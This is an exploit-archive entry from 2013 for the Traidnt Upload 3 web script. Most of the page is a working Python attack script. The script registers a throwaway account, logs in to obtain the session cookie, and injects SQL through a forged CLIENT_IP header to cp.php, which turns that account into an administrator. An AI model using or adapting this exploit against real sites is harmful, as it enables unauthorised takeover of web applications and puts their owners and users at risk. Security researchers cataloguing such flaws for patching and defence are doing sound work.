Traidnt Upload 3 Add Administrator



EKU-ID: 3721 CVE: OSVDB-ID:
Author: i-Hmx Published: 2013-12-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
import urllib2
import sys
print """
+-------------------------------------------+
|   Traidnt upload 3 - Admin add Exploit    |
|                  By i-Hmx                 |
|                sec4ever.com               |
|             n0p1337@gmail.com             |
+-------------------------------------------+"""
target=str(raw_input("[*] Enter Target <http://site.com/path> # "))
print "[+] Adding new user"
try:
	register=urllib2.urlopen(target+"/register.php","name=farsawy&email=n0p1337@gmail.com&password=sec4ever&rules=faris rules")
except:
	print "[-] Exception happened :("
	sys.exit()
print "[+] Grabbing Cookies"
login=urllib2.urlopen(target+"/login.php?do=login","username=farsawy&password=sec4ever")
headers=login.headers.items()
for header in headers:
	if header[0]=="set-cookie":
		cookies=header[1]
		if cookies.find("upload_sid")==-1:
			print "[-] Exploitation Failed"
			sys.exit()
			
print "[+] Upgrading privelages"
req=urllib2.Request(target+"/cp.php",headers={"Cookie":cookies,"CLIENT_IP":"1337',`group`='1"})
upgrade=urllib2.urlopen(req)
print "[+] Login with the following data\n    + User : farsawy\n    + pass : sec4ever\n    + Probably you are an admin now ;)"
sys.exit()